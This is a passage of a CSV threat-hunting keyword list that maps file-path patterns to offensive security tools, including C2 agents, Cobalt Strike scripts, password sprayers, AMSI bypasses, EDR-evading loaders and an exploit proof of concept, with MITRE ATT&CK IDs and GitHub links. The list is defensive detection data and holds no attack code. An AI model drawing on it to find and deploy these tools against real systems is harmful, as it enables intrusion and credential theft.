-*/aerosol.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z
-*/afp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/afp-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/afp-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/afp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/afp-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/afrog-pocs/*,offensive_tool_keyword,afrog,A tool for finding vulnerabilities,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/zan8in/afrog,1,1,N/A,N/A,10,2135,272,2023-09-28T09:41:46Z,2022-02-24T06:00:32Z
-*/agent.ps1.oct*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*/agent/C/src/*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z
-*/agent/stagers/dropbox.py*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z
-*/agent_code/Apollo/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z
-*/agent_code/Athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*/agent_code/cmd_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z
-*/agent_code/dll.go*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z
-*/agent_code/merlin.*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - 
T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z
-*/agent_code/powershell_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z
-*/agent_code/sh_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z
-*/agent_code/zsh_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z
-*/agent_functions/*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*/agent_icons/athena.svg*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AggressiveClean.cna*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/aggressor/*.java*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/aggressor-powerview*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/agscript *,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. 
including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/agscript *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/ahmedkhlief/Ninja/*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/ahrixia/CVE_2022_0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,1,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*/ajp-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-request.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/alan.log*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*/Alan.v*.zip*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*/Alaris.sln*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*/Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz.git*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz/files/*/Alcatraz.zip*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz/x64*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz-gui*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - 
TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/all/pupyutils/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/allseeingeye-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amass/wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amqp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amsi.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Amsi_Bypass_In_2023*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*/AMSI_patch.git*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense 